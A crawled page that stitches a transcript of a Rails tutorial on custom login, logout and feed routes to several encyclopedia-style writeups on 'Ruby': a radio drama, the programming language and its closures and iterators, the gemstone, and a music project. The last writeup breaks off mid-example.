Hello guys, I am having some trouble with logging into the dashboard with a token. I have been googling for 3 days and the same issue is explained on the internet, but with the given answers I couldn't solve my problem.
The problem is: I have installed the Kubernetes dashboard on my virtual machine. From a local browser (on the virtual machine) I can easily access the dashboard with a TOKEN and sign in completely fine, BUT when I want to access the same dashboard from my computer (not the virtual machine) and paste the TOKEN where it is required and click Sign In, nothing happens. Can someone please help me with how to access my dashboard remotely and solve this issue?
NOTE: Accessing the dashboard (both locally from the virtual machine and remotely from my computer) works completely fine, but when I want to log in with a token, just nothing happens. I don't know why.
I also tried some port forwarding like ssh -L 8001:localhost:8001 root@<IP>, but it did not fix my error.
Accessing the dashboard locally:
Accessing the dashboard remotely (as above, but with the IP of the virtual machine): <IP>:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login
Thanks a lot.
Hi Sal!
Not really. I guess that access to the dashboard just isn't possible this way.
As someone mentioned below: it cannot be accessed from anywhere other than the master.
try this @Denis,
kubectl proxy --address=master-node-ip --port 8001 --accept-hosts '.*'
How are you getting the token?
Try using this token:
kubectl -n kube-system get secret |grep kubernetes-dashboard-token |cut -f1 -d ' ' | xargs kubectl -n kube-system describe secret
Sarah & Vardhan, I also came to the conclusion that accessing the dashboard from anywhere other than the master won't work.
So my solution is: create 1 master (maximal Linux install) and 2 nodes (minimal Linux install) on the same vCenter, and then access my dashboard from the master, where I have installed the maximal version with a GUI. This is the only way to fix the problem, I guess.
Dashboard should not be exposed publicly using the kubectl proxy command, as it only allows HTTP connections. For domains other than localhost and 127.0.0.1 it will not be possible to sign in: nothing will happen after clicking the Sign in button on the login page.
Is there any function equivalent to Python's fcntl.ioctl in Java ?
It would help if you told us what that function actually does, or what you need it for, or what you're actually trying to do.
Actually, my work is to convert a Python application to a Java application.
Here I am having trouble with the following code; I don't know exactly what it does.
```
def get(self):
    self.corrections = fcntl.ioctl(self.joystick, -2145097182, self.corrections)
    for n in range(5):
        self.correction[n].unpack(self.corrections[(n * 36):((n + 1) * 36)])
```

Kindly advise me.
You have to convert your python code to English (or whatever your first language is) first, then convert that to Java. You can't convert python code to Java code by "translating" one line at a time. Figure out what the program does, then write a program that does it in Java. | http://www.javaprogrammingforums.com/%20whats-wrong-my-code/14604-fcntl-ioctl-equalient-code-java-printingthethread.html | CC-MAIN-2018-09 | refinedweb | 166 | 68.67 |
Macros have a long history in computing, and sweet.js may just let you program JavaScript any way that you would like.
Sweet.js is a Mozilla project to add a macro facility to JavaScript. While it is true that Mozilla has many projects that never really make much impact, this one is worth knowing about, if only to put languages and the problems they create into perspective.
A macro language is essentially a text processing language and the big problem is that they vary a lot in power. For example, the basic C macro facility is more-or-less automated copy and paste. Simple macro language have almost succeeded in bringing macro languages into disrepute, but sweet.js is a bit more sophisticated.
It is referred to as a "hygienic" macro language because it doesn't pollute the language it manipulates with unnecessary resources. Put simply it doesn't create or use variables in the language it works with. However, sweet.js isn't just a hygienic language it is also a powerful template language which can transform macro code into equivalent JavaScript. You can think of it as a sort of customizable compiler - but this might be over stating the case.
For example, if you want to write def in place of the usual function keyword you can define a macro:
```
macro def {
  case $name:ident $params $body => {
    function $name $params $body
  }
}
```
and following this a statement like:
def sweet(a) { console.log("Macros are sweet!"); }
is transformed into
function sweet(a) { console.log("Macros are sweet!"); }
Notice that while this example looks like a simple substitution of "function" for "def" the macro defines what happens to whatever follows the "def" in potentially complex ways.
Using macros is a matter of pattern matching, but when macros include conditionals and recursion, as sweet.js's do, things become very powerful, and in principle you could write a compiler using nothing but the macro language.
Of course in this case the intention of sweet.js is to allow you to extend JavaScript in ways that suit your particular style of programming. If you would be happier with JavaScript with a Basic-style for loop then you can write a macro to convert
For i=1 To 10
into
for(var i=1;i<=10;i++)
You could also use sweet.js to implement Domain Specific Languages, DSLs.
Sweet.js is written in JavaScript and can work as a Node.js package. It acts as a compiler that takes in a macro file consisting of macro definitions and code and outputs pure JavaScript. You could say it is another compiler that treats JavaScript as its assembly language, but in this case the output should be easy for a human to understand because of the close and meaningful relationship between the macro and the output.
The project has been going for a month or so and sweet.js is fairly usable with some omissions and bugs. You can also use it with Ruby. The code is open source and you can download it from Github.
I currently have a volume spanned by a few million every unevenly spaced particles and each particle has an attribute (potential, for those who are curious) that I want to calculate the local force (acceleration) for.
np.gradient only works with evenly spaced data and I looked here: Second order gradient in numpy where interpolation is necessary but I could not find a 3D spline implementation in Numpy.
Some code that will produce representative data:
import numpy as np
from scipy.spatial import cKDTree
x = np.random.uniform(-10, 10, 10000)
y = np.random.uniform(-10, 10, 10000)
z = np.random.uniform(-10, 10, 10000)
phi = np.random.uniform(-10**9, 0, 10000)
kdtree = cKDTree(np.c_[x,y,z])
_, index = kdtree.query([0,0,0], 32) #find 32 nearest particles to the origin
#find the gradient at (0,0,0) by considering the 32 nearest particles?
Intuitively, for the derivate wrt one datapoint, I would do the following
data=phi[x_id-1:x_id+1, y_id-1:y_id+1, z_id-1:z_id+1]. The approach with the kdTre looks very nice, of course you can use that for a subset of the data, too.
This would be a simple solution to your problem. However it would probably be very slow.
EDIT:
In fact this seems to be the usual method:
The accepted answer talks about deriving an interpolating polynomial. Although apparently that polynomial should cover all the data (Vandermonde matrix). For you that is impossible, too much data. Taking a local subset seems very reasonable. | https://codedump.io/share/gHe2uT1NHzAD/1/calculating-a-3d-gradient-with-unevenly-spaced-points | CC-MAIN-2017-47 | refinedweb | 256 | 50.63 |
Tax
Have a Tax Question? Ask a Tax Expert
Hello and thank you for using Just Answer,
Partnerships, S Corporations and limited liability companies may file, on behalf of their nonresident partners, shareholders, or members, a unified return (Form 765) thereby relieving these persons of the responsibility of filing a Virginia nonresident individual return.As a nonresident with no other income in Virginia you are not required to file a Virginia return, but if you choose to file the Nonresident return to carry forward your losses your allocation will be zero.Just like federal, Virginia requires that partnerships with nonresidents withhold throughout the year on income that would attributable to the nonresident partner, even if no payment is actually disbursed to the nonresident partner. In that case you would file a return to request the withholding in excess of tax liability.
As I am the only non resident partner they will not file a form 765.
Your answer appears to agree with the statements in my question to you. Is that right?
Well, if the partnership will not file then you are not required to file if your income for Virginia falls below the level to file. If all your partnership is loss then you are not required to file.
I agreed with the part about allocation percentage and I thanked you for a positive rating, in advance
I said they will not file a 765 form (because I am the only non resident partner, hence they can't file that form which is a grouping of partnerss), but they filed a VK-1 on my behalf. | http://www.justanswer.com/tax/73ouk-good-afternoon-i-non-us-resident-partner.html | CC-MAIN-2016-40 | refinedweb | 267 | 55.68 |
URGENT info for Linux users - new updater tool version v1.10.0.b3 - FiPy device reset
A new version of the firmware update tool for Linux has been released.
This fixes an urgent issue causing FiPy and LoPy4 devices not to have proper Sigfox credentials assigned when using the dialog based cli update script on Linux.
I have identified 16 FiPy devices in our database that are currently affected by this issue. Unfortunately I will have to remove those 16 devices from our database, and if you have been affected by this issue, you will have to select your device details again during the next firmware update.
If you experience any issues following your device reset, please email support@pycom.io
@sioo I'm not sure how it happened but you're right, the LoPy4 option has disappeared from the latest script... I'll check this now and will get a new script uploaded as soon as possible.
Please first of all send me you mac address. You can get this from the REPL via:
import machine,binascii
binascii.hexlify(machine.unique_id())
Please send me the output of this command via personal message or via email to support@pycom.io and I will reset your device.
Can you please check if the command python lopyupdate.py is working? This should get you the GUI version.
Otherwise please wait until I have checked the script to make sure the LoPy4 selection is working properly.
LoPy4 is not shown in the ask device dialog. Looked through the code and noticed that LoPy4 is not present as an selection in
device_dialog().
Unfortunately, before doing the above and added LoPy4 as selection, I picked Lopy for my LoPy4 so I got that firmware instead. Now when I select LoPy4 I still get the lopy firmware. But I tried messing around setting
firmware_typeto
lopy4.lopy4 with esp32.868, and sure enough I got the Lopy4 firmware but when I try retrieving sigfox device id it reads as
ffffffffand sigfox pac number
ffffffffffffffff, which cant be right?
I was one of the 16th. No problems here. Good work. | https://forum.pycom.io/topic/2507/urgent-info-for-linux-users-new-updater-tool-version-v1-10-0-b3-fipy-device-reset/ | CC-MAIN-2021-04 | refinedweb | 352 | 74.79 |
I am suppose to..
Write a program that asks for the weight of the package and the distance it is to be shipped and then displays the charges.
weight of package in kg rates per 500 miles shipped
2 kg or less $1.10
over 2kg but not more than 6kg $2.20
over 6kg but not more than 10 kg $3.70
over 10kg but not more than 20 kg $4.80
so far i have this...and when i compiled it it is all wrong..
#include<iostream> #include<iomanip> using namespace std; int main() { float weight, distance, rate; cout << "Enter the weight of the package."; cin >> weight; cout << "Enter the distance to be shipped."; cin >> distance; if ( weight <= 2kg ) rate = $1.10; if ( weight > 2kg && weight < 6kg ) rate = $2.20; if ( weight > 6kg && weight < 10kg ) rate = $3.70; if ( weight > 10kg && weight < 20 kg ) rate = $4.80;
** Edit **
| http://www.dreamincode.net/forums/topic/133376-equation-for-calculation-of-shipping-charges/ | CC-MAIN-2016-26 | refinedweb | 150 | 103.73 |
Re: Multiple NET apps under 1 domain
- From: "nospam" <no@xxxxxxxx>
- Date: Fri, 05 Oct 2007 01:44:16 GMT
Patrice,
Thanks for your reply.
I have bitten the bullet and merged the 2 VS solutions into 1.
I guess I am an old crusty C++ programmer and developed the 2 individual
solutions from habit.
In regards to IIS, I use Visual Studio to display my applications in a
browser.
When I do this a process starts up locally named "Visual Studio Development
Server".
I guess that is acting as IIS.
Regards,
bruce
"Patrice" <> wrote in message
news:eN5M%23qqBIHA.1056@xxxxxxxxxxxxxxxxxxxxxxx
My personal preferences would be :
- to use a virtual dir so that each application is in its own physical
directory (and not one as a subfolder in the main one)
- to combine both
- to deploy them NOT using the publish functionality (you could likely use
FTP).
As a side note if you don"t have access to IIS how could you anyway define
the /admin directory as being an IIS application ?
Good luck.
--
Patrice
"nospam" <no@xxxxxxxx> a écrit dans le message de news:
TK8Ni.11489$ht5.3885@xxxxxxxxxxx
Thanks for the reply Patrice.
Yes I do have 2 apps. I don't have access to IIS. I do my development
using VS 2005 and their local pseudo IIS server.
I have 2 VS solutions which need to be published to the same domain.
I could combine the two ( and sort out all of the connection string
possible namespace collisions).
I was looking for the ability to maintain 2 VS solutions that point to
the same domain - for example for the world only for DBA
It doesn't look like the publish functionality supports this intuitively.
I dk.
"Patrice" <> wrote in message
news:ubUC2JqBIHA.4200@xxxxxxxxxxxxxxxxxxxxxxx
Looks like you want to create two distinct applications. My personal
preference would be likely to put each one in its own folder and use a
virtual folder inside the main web application to map /admin to the
location for the admin application (also defined as a web application).
See :
--
Patrice
"nospam" <no@xxxxxxxx> a écrit dans le message de news:
N68Ni.30774$jC5.27661@xxxxxxxxxxx
Hello everyone -
Newbie here with another dumb question :-)
I want to have several apps under 1 domain - basically the domain root
for general users and then an "admin" folder with a database utility
So the world will go to (Default.aspx) and see the
website and maybe fill out a form which is stored in a db.
The admin dba will go to and do
his/her stuff.
But if I set this up ( in 2 different VS 2005 solutions), when I
publish the admin app it erases the generalusers folder. During
publish there is a dialog box that comes up that asks is it ok to
erase. If I say 'no' then the publish fails.
How do I set this up?
There also seems to be a 'precompileapp.config' file which is written
to the domain root which I think will interfere with the generalusers
app.
How do I stop the admin publishing from deleting everything in the root
folder?
Many thanks in advance.
Regards,
bruce
.
- References:
- Multiple NET apps under 1 domain
- From: nospam
- Re: Multiple NET apps under 1 domain
- From: Patrice
- Re: Multiple NET apps under 1 domain
- From: nospam
- Re: Multiple NET apps under 1 domain
- From: Patrice
- Prev by Date: RE: HttpModule Init method invoked on every request
- Next by Date: Managing multiple data source connection string parameter in Web.config
- Previous by thread: Re: Multiple NET apps under 1 domain
- Next by thread: Download timeout after ~15 min
- Index(es): | http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.aspnet/2007-10/msg00654.html | crawl-002 | refinedweb | 611 | 62.58 |
Assume failure by default. Chris Oldwood considers various fail cases.
Two roads diverged in a wood, and I –I took the one less travelled by,And that has made all the difference.
~ Robert Frost
Despite being written in the early part of the 20th century, I often wonder if Robert Frost’s famous poem might actually have been about programming. Unless you’re writing a trivial piece of code, every function has a happy path and a number of potential error paths. If you’re the optimistic kind of programmer, you’ll likely take the well trodden path and focus on the happy outcome and hope that no awkward scenarios turn up. This path is exemplified in the original version of that classic first program which displays “hello, world!” on the console:
main() { printf("hello, world\n"); }
A standards-conforming version of this classic C program requires the
main function to be declared with an
int return type to remind us that we need to inform the invoker of any problems, but luckily we get to remain optimistic as we can elide any return value (only for a function named
main) and happily accept the default –
0. Consequently, irrespective of whether or not the
printf statement actually works, we’re going to tell the caller that everything was hunky-dory.
The classic C version relies on a spot of ‘legal slight-of-hand’ to allow you to put the program’s return value out of mind whereas C# and Java needed to find another way to let you ignore it so they allow you to declare
main without a return type at all:
public class Program { public static void Main(...) { // print "Hello World!" } }
Of course, these languages use exceptions internally to signal errors so it doesn’t matter, right? Well, earlier versions of Java would return
0 if an uncaught exception propagated through
main so you can’t always rely on the language runtime to act in your best interests [Wilson10]. Even with .Net you can experience some very negative exit codes when things go south which will make a mockery of that tried-and-tested approach to batch-file error handling everyone grew up with:
IF ERRORLEVEL 1
Unless you know that
Main can also return an exit code I don’t think it should be that surprising that people have resorted to silencing those pesky errors with an all-encompassing
try/
catch block:
public static void Main(...) { try { // Lots of cool application logic. } catch { // Write message to stderr. } }
I wonder if this pattern is more common than even I’ve experienced as PowerShell has taken the unconventional approach of treating any output on the standard error stream as a sign that a process has failed in some way. This naturally causes a whole different class of errors on the other side of the fence that could be considered worse than ‘the cure’.
Back in the world of C and C++ we can be pro-active and acknowledge our opportunity to fail but are we still being overly optimistic by starting out by assuming success?
int main(int argv, char **argv) { int result = EXIT_SUCCESS; // Lots of cool application logic. return result; }
It’s generally accepted that small focused functions are preferable to long rambling ones but it’s still not that uncommon to need to write some non-trivial conditional logic. When that logic changes over time (in the absence of decent test coverage) what are the chances of a false positive? When it comes to handling error paths, I’d posit that it’s categorically not zero.
The trouble with error paths are that they are frequently less travelled and therefore far less tested. A bug in handling errors where the flow of control is not correctly diverted can lead to other failures later on which are then harder to diagnose as you’ll be working on the assumption of some earlier step having completed successfully. In contrast, a false negative should cause the software to fail faster which may be easier to diagnose and fix. To wit, assume failure by default:
int result = EXIT_FAILURE;
The term ‘defensive programming’ is one which was well intentioned, and requires an acknowledgement of failure to allow robust code to be written, but it has also been used to cover a multitude of sins – counter-intuitively making our lives harder, not easier. It stems from a time when development cycles were long, releases were infrequent, and patching was expensive. In a modern software delivery process Mean Time to Recovery is often valued more highly than Mean Time to Fail.
Another area where I find an overly optimistic viewpoint is with test frameworks. Take this simple test, which does nothing:
[Test] public void doing_nothing_is_better_than_being_ busy_doing_nothing() { }
Plato once said that an empty vessel makes the loudest sound, and yet a test which makes no assertions is usually silent on the matter. Every test framework I’ve encountered makes the optimistic assumption that as long as your code doesn’t blow up, then it’s correct, irrespective of whether or not you’ve even made any attempt to assert that the correct behaviour has occurred. This is awkward because forgetting to finish writing the test (it happens more often than you might think) is indistinguishable from a passing test.
When practising TDD, the first step is to write a failing test. This is not some form of training wheels to help you get used to the process, it’s fundamental in helping you ensure that what you end up with is working code and test coverage for the future. Failing by default brings clarity around what it means to succeed, or in a modern agile parlance – what is the definition of ‘done’?
In those very rare cases where the outcome cannot be expressed as the absence of some specific operation occurring, there are always the following constructs to make it clear to the reader that you didn’t just forget to finish writing the test:
Assert.Pass(); Assert.That(. . ., Throws.Nothing);
The few mocking frameworks which I’ve had the displeasure to use also have a similar misguided level of optimism when it comes to writing tests – they try really hard to hide dependencies and just make your code work, i.e. they adopt the classic ‘defensive programming’ approach which I mentioned earlier. It’s misguided because exposing your dependencies to the reader is a key part of illustrating what the reader needs to know to understand what interactions the code might rely on. If this task is onerous then that’s probably a good sign you need to do some refactoring!
I’m being overly harsh on Hello World; it’s a program intended for educational purposes not a shining example of 100% error-free code (whatever that means). I’m sure a kitten dies every time an author writes ‘error handling elided for simplicity’ but maybe that’s an unavoidable cost of trying to present a new concept in the simplest possible terms. However, when it comes to matters of correctness perhaps we need to take the difficult path if we are going to provide the most benefit in the longer term.
Reference
Matthew Wilson (2010) ‘Quality Matters #6: Exceptions for Practically-Unrecoverable Conditions’ in Overload #99, October 2010, available at: | https://accu.org/journals/overload/28/159/oldwood/ | CC-MAIN-2021-10 | refinedweb | 1,218 | 53.55 |
<ac:macro ac:<ac:plain-text-body><![CDATA[
Zend Framework: Zend_Test_PHPUnit_Database Component Proposal
Table of Contents
1. Overview
using Zend_Db to effectivly write Database related tests. This proposal
is for a subcomponent in the Zend_Test namespace that implementes the
necessary interfaces of the PHPUnit_Extensions_Database to make this tool
work with Zend_Db_Adapter_Abstract connections.
as a dataset which would make testing against Zend_Db_Table and corresponding
Zend_Db_TableRowset instances a bit more convenient.
also be integrated as additional assertions.
2. References
The PHPUnit Database Extension is very PDO centric and may hinder people
It would also allow for a very simple integration of a Zend_Db_Table implementation
Additionally the profiler does much work on counting queries and stuff, which could
3. Component Requirements, Constraints, and Acceptance Criteria
- This component MUST allow using Zend_Db_Adapter_Abstract in conjunction with PHPUnits database extension.
- This component MUST allow using Zend_Db_Table implementations as DataSets to test against.
- This component MUST add new constraints for use with the Zend_Db_Profiler
4. Dependencies on Other Framework Components
- Zend_Db_Adapter_Abstract
- Zend_Db_Table
- PHPUnit
5. Theory of Operation
Operation with this component would be exactly the same as in the current PHPUnit Database Extension.
You seed the database with a default dataset and perform operations the database as you would in normal production enviroment. At any stage you can assert weater two datasets are equal, which proves test-success.
Step by step:
1. At each testrun, PHPUnit clears the database and refills it with the Seed Data you are giving to it.
2. You perform database operations.
3. You assert that the content of two datasets are the same, where a dataset is an abstract definition of rows in a table.
Datasets come from very different sources: Flat XML format, a more complex XML format, in the next version YAML, from other database tables and from CSV-Files.
PHPUnits Database Extension puts those into a common format and allows them to be comparable so that you can check for example weater the contents of a database table equal the contents in a given XML file after you performed some operations in the test-case.
6. Milestones / Tasks
- Milestone 1: Proposal, Community Review and Acceptance
- Milestone 2: Unit-Testing and Development
- Milestone 3: Documentation and Testing
7. Class Index
- Zend_Test_PHPUnit_DatabaseTestCase
- Zend_Test_PHPUnit_Database_Connection
- Zend_Test_PHPUnit_Database_DataSet_ZendDbTable
- Zend_Test_PHPUnit_Database_DataSet_RowSet
- Zend_Test_PHPUnit_Database_Metadata_Generic
- Zend_Test_PHPUnit_Database_Operation_*
6 Commentscomments.show.hide
Feb 05, 2009
Ralph Schindler
<p>Can you talk about where (in the current project structure) database fixtures (and other testing data) would go?</p>
<p>Does this mean that the schema needs to be defined somewhere so that a full build up and breakdown can be used? If this is the case, where does the schema go in the project structure?</p>
<p>I think we need to start discussing how we are gonna manage the tearing up and breaking down of a projects sql ddl and dml files.</p>
Feb 05, 2009
Benjamin Eberlei
<p>PHPUnit Database extension takes the Schema as a given. It has to be able to accept the seed-data as input. Therefore you it has to be installed on the database beforehand.</p>
Feb 06, 2009
bullfrogblues
<ac:macro ac:<ac:plain-text-body><![CDATA[i agree, currently i use the following which takes an sql file. The table is dropped if it exists, which i don't like and should change.
DbTestsHelperMethod
protected function _loadDbSchema()
{
$schemaFile = Zend_Registry::get('testDbSchemaPath');
$schema = file_get_contents($schemaFile);
$statements = explode(';', $schema);
$db = $this->_db;
$conn = $db->getConnection();
$filter = new Zend_Filter_StringTrim();
foreach ($statements as $statement)
}
SQL
–
-- Table structure for table `name`
–
DROP TABLE IF EXISTS `name`;
CREATE TABLE IF NOT EXISTS `name` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(255) collate utf8_unicode_ci NOT NULL,
`date_created` date default NULL,
PRIMARY KEY (`id`)
) ENGINE=INNODB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
I place my test db schema file in the application config folder and register it in my testHelper to "testDbSchemaPath" and simply call it when needed:
$schemaFile = Zend_Registry::get('testDbSchemaPath');
I think this is better because it doesn't matter where it is.
That said there could be a default, maybe a _files/schema folder below the actual Class?
so,
$path = realpath(dirname(_FILE_) . '/../')) . '/_files/schema;
$sql = $path . '/db-schema.sql
$xml = $path . '/db-schema.xml
]]></ac:plain-text-body></ac:macro>
Feb 26, 2009
Matthew Weier O'Phinney
<p>Ben, there was some talk at one point about pushing the DBUnit provider and assertions into classes that could be consumed from within a generic PHPUnit_Framework_TestCase. Can you verify if this has been done? if so, would this proposal target such an approach?</p>
<p>The reason I ask is that, for the larger goal of functional testing, it would be handy to have the ability to grab a DB provider, do your seeding, and then do assertions against the DB following an operation. Right now, the way your proposal stands, you would not be able to do that as the DBUnit integration uses its own specialized test case.</p>
Feb 26, 2009
Benjamin Eberlei
<p>the testcase is jsut for convenience, it only consists of methods that proxy to classes to make it easier to work with. Its perfectly possible to do seeding from any testcase base class, if you know how to do it.</p>
<p>this is a good point, which needs documentation and i will make sure to write a bigger example part on the cases where you cannot work with the DatabaseTestCase class.</p>
Mar 27, 2009
Matthew Weier O'Phinney
<ac:macro ac:<ac:parameter ac:Zend Acceptance</ac:parameter><ac:rich-text-body>
<p>This proposal is accepted for immediate development in the standard incubator, with one minor change:</p>
<ul>
<li>Zend_Test_PHPUnit_Database_ namespace to be renamed to Zend_Test_PHPUnit_Db (for consistency with the Zend_Db namespace)</li>
</ul>
</ac:rich-text-body></ac:macro> | http://framework.zend.com/wiki/display/ZFPROP/Zend_Test_PHPUnit_Database+-+Benjamin+Eberlei?focusedCommentId=9437767 | CC-MAIN-2014-10 | refinedweb | 960 | 51.68 |
26 September 2012 10:56 [Source: ICIS news]
SINGAPORE (ICIS)--?xml:namespace>
The data also showed that 74.7% and 12.5% of imports arrived in
Meanwhile, the average toluene import prices in August were at $1,103/tonne (€849/tonne) CFR (cost and freight) China, down by around $18/tonne from July, according to the data.
The import prices were higher than domestic prices in early August, with the price spread at yuan (CNY) 150-250/tonne ($24-40/tonne), importers said.
The average domestic prices for August were assessed at CNY8,480/tonne ex-tank Zhangjiagang, according to Chemease, an ICIS service in
($1 = €0 | http://www.icis.com/Articles/2012/09/26/9598629/chinas-toluene-imports-fall-by-11-in-august-on-weak-demand.html | CC-MAIN-2015-22 | refinedweb | 107 | 64.51 |
Creating Custom Routes (15:05) with Jim Hoskins
Devise created several routes for registering and signing in and out, but we can create our own routes to design what our URLs will look like to the world.
- 0:00
[Jim Hoskins]: When we set up Devise, it created several routes
- 0:02
or URLs for things like signing up and logging in.
- 0:05
We could actually customize these URLs
- 0:07
by updating a special config file
- 0:09
called our "routes.rb" file.
- 0:12
So, now we've got our alerts all set up,
- 0:14
but there are a couple more things that I want to work on.
- 0:16
If we click on Register right here,
- 0:18
we get our Register page,
- 0:20
but the URL for it is /users/sign_up,
- 0:24
and it would be nice if it was just something like
- 0:27
- 0:29
So, how do we go about doing this?
- 0:31
Well, we want to start modifying our routes.
- 0:34
Now, our routes are what map our URLs
- 0:37
to the actual controller actions
- 0:39
and pages that we see.
- 0:41
So, for instance, if we go to /statuses,
- 0:43
we get all of our statuses.
- 0:45
In fact, if we go to the root, we also get all of our statuses.
- 0:48
This is managed in a special file in the Config directory,
- 0:52
not the App directory.
- 0:54
So, if we open up Config, we'll see a file called "routes.rb,"
- 0:58
and there's already some code in it.
- 1:00
Everything between lines 7 and down here to line 62
- 1:05
is all documentation.
- 1:07
The # right here defines a comment,
- 1:09
which means it's not code that's interpreted.
- 1:11
Instead, it's for us to read.
- 1:14
So, we could remove this entirely,
- 1:16
but Rails provides us with a lot of comments in here
- 1:18
so we can understand how the routes work.
- 1:21
If we take a look at what's in it right now,
- 1:23
we have different rules
- 1:25
and these rules are tried, in order,
- 1:28
every time we get a request to find out where it should actually be handled.
- 1:31
So, for instance,
- 1:33
there's actually a special helper here
- 1:35
from Devise called "devise_for :users"
- 1:37
and this sets up quite a few of the routes.
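With the generated comments stripped away, the file at this point amounts to something like the following (a sketch — "Treebook" stands in for whatever your application module is actually named):

```ruby
# config/routes.rb with the documentation comments removed (sketch)
Treebook::Application.routes.draw do
  devise_for :users          # the Devise helper discussed here
  resources :statuses        # /statuses lists all statuses
  root to: "statuses#index"  # the root URL also shows statuses
end
```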
- 1:41
You'll remember we saw our routes when we did
- 1:43
our rake routes.
- 1:45
We can type it in here, rake routes,
- 1:47
and what rake routes actually does
- 1:50
is take a look at our routes file
- 1:52
and figure out what goes where.
- 1:55
So, that devise_for :users is responsible
- 1:57
for all of these routes.
- 1:59
Our user_session routes for logging in and out,
- 2:01
our user_password routes for modifying our password,
- 2:03
and our registration paths.
- 2:06
You can see that they're all namespaced under /users here.
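For reference, the Devise block of that rake routes output looks roughly like this (abridged and from memory — the exact set of routes depends on your Devise version and which modules you've enabled):

```text
        new_user_session GET    /users/sign_in   devise/sessions#new
            user_session POST   /users/sign_in   devise/sessions#create
    destroy_user_session DELETE /users/sign_out  devise/sessions#destroy
   new_user_registration GET    /users/sign_up   devise/registrations#new
       user_registration POST   /users           devise/registrations#create
```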
- 2:09
We can modify these, but it's best for us to take a look
- 2:12
at the Devise documentation,
- 2:18
because there are some helpers in play,
- 2:20
there are some specific rules for how we create
- 2:23
our specific Devise routes.
- 2:25
So, for instance, we can take a look at our documentation,
- 2:27
we can search for routes to find exactly where it is,
- 2:34
and we can find the Configuring Routes section.
- 2:37
Now, there are a couple of different examples here.
- 2:40
This first example explains if we wanted to just change the second part of our route.
- 2:44
Let's start up our Rails server again.
- 2:50
You can see that our routes are separated by /users
- 2:53
and /sign_up.
- 2:55
So, if we wanted to just change sign_up to users/register,
- 2:58
we could use this first example from the documentation.
- 3:00
For instance, adding path_names for our devise_for call
- 3:04
and changing our registration
- 3:06
to 'register' as well as any of the other routes.
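That first example from the docs boils down to passing a path_names hash to devise_for (a sketch — only the segments you list are renamed, and named helpers like new_user_registration_path keep their original names):

```ruby
# Rename just the /sign_up segment, giving /users/register (sketch)
devise_for :users, path_names: { sign_up: "register" }
```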
- 3:10
Now, I'm fine with the
- 3:12
existing routes and how they are.
- 3:14
We don't really need to change them.
- 3:16
In fact, what I'd like to do is have a simple URL
- 3:18
at the top level where it's just going to be
- 3:21
- 3:25
We'll just call this a custom route.
- 3:27
I'm going to leave everything else in place,
- 3:29
but places where I want to link to /register
- 3:32
will have a new route that also points to this exact same page.
- 3:36
So, we can do that
- 3:38
by going into our routes.rb
- 3:40
and following the example in our documentation.
- 3:42
So, it says we want to wrap it
- 3:44
in a devise_scope block.
- 3:47
Now, Devise is nice because it allows us to have
- 3:49
multiple ways of logging in.
- 3:51
This is why we see our scope of user
- 3:53
in both our URL and our routes.
- 3:55
Later on, we could create another way of logging in
- 3:57
for a model called, let's say, "Admins,"
- 4:00
and that would be 2 completely distinct authentication systems.
- 4:03
One for users, and one for admins,
- 4:05
and Devise allows us to namespace it.
- 4:08
So, that's why we see users everywhere,
- 4:10
including in our URLs.
- 4:12
Right now, we really only have 1 way of logging in,
- 4:15
and that's through the user,
- 4:17
but we'll still use the devise_scope :user right here.
- 4:20
So, we'll go to our routes,
- 4:22
and I'm going to add this beneath our devise_for :users,
- 4:25
because it's slightly lower priority.
- 4:27
We type out our devise_scope block,
- 4:32
and it's going to be :user, and we'll open up our block with a 'do'
- 4:37
and close it with an 'end.'
- 4:39
Now, any route we define inside of this block
- 4:41
will be properly scoped to the user model.
- 4:45
We can see an example here.
- 4:47
What we want to do is we want to match
- 4:49
our register.
- 4:52
What we say when we do this is,
- 4:54
this is 'get' and this means anytime we get a get request
- 4:58
to /register, we want this route to match.
- 5:02
Now, we have to pass some options.
- 5:04
When we see a get request to /register, what do we want to do?
- 5:08
We want to use the 'to:' option,
- 5:10
and that is 'to:'
- 5:12
and then we pass it the string.
- 5:15
This is a string that we can see an example of here.
- 5:18
It's a name of our controller and the name of an action,
- 5:23
separated by #.
- 5:26
So, what do we want to do?
- 5:28
Well, in this example we're can see it's:
- 5:30
devise/sessions#new.
- 5:34
For us it should be:
- 5:36
devise/registrations#new.
- 5:43
So, let's see if that works.
- 5:45
Everything should be running, so if we go to /register now--
- 5:48
I refreshed, and it worked.
- 5:51
If we go to register, we can see it works.
- 5:53
We can make sure that it wasn't just a fluke
- 5:55
if we go to a misspelled name,
- 5:57
we see we get a routing error.
- 5:59
If we go and click the Register button,
- 6:01
we can see it's still available
- 6:03
ast /users/sign_up,
- 6:05
but I would like to use /register.
- 6:09
Now, by adding this to routes all we've done is another URL
- 6:11
that it recognizes for that page.
- 6:14
It has not changed what we actually link to,
- 6:16
and that's our responsibility.
- 6:18
We could go into our views and change our links
- 6:21
to link to /register,
- 6:23
however, we've seen how using our named routes
- 6:26
are very helpful.
- 6:28
So, what we want to do is add a named route,
- 6:30
and we give this a name by passing another option--
- 6:33
as:
- 6:35
and we can just type in a name as the symbol,
- 6:37
and we can see how this works with rake routes once again.
- 6:41
I've saved it, and if we do rake routes,
- 6:44
we can see we now have
- 6:46
this new register name here,
- 6:50
which means we'll be able to use the helper register_path
- 6:54
or register_URL,
- 6:56
and it'll link to /register.
- 6:59
So, that name allows us to use a named helper
- 7:01
inside of our Views.
- 7:03
So, let's start up the Rails server
- 7:05
and go into our Views,
- 7:07
application.html.erb
- 7:10
and find that link.
- 7:14
Here we can see the new_user_registration_path
- 7:17
which we can replace with the
- 7:19
register_path.
- 7:21
We save it out, we go back, and we refresh.
- 7:25
If we hover over this, we should see it now links to /register,
- 7:28
and it goes exactly where we want.
- 7:31
The process is the same for logging in.
- 7:35
We, again, have this /users/sign_in,
- 7:38
but we want to go to a different page.
- 7:40
We can do pretty much the same thing
- 7:42
by opening up our routes again,
- 7:45
and we can, for the most part, copy and paste.
- 7:48
I now want it to be login,
- 7:52
and we can change this.
- 7:55
Now it's not a new registration that we're going to
- 7:57
it's actually a session.
- 8:00
Our controller is devise/sessions
- 8:03
because when we log in we're creating
- 8:05
a new session,
- 8:07
and the #new action is still correct.
- 8:09
We also have to change the name.
- 8:12
So, we'll change this to login.
- 8:14
We can save it.
- 8:17
If we refresh
- 8:21
and go to /login,
- 8:24
we get our Sign In page.
- 8:26
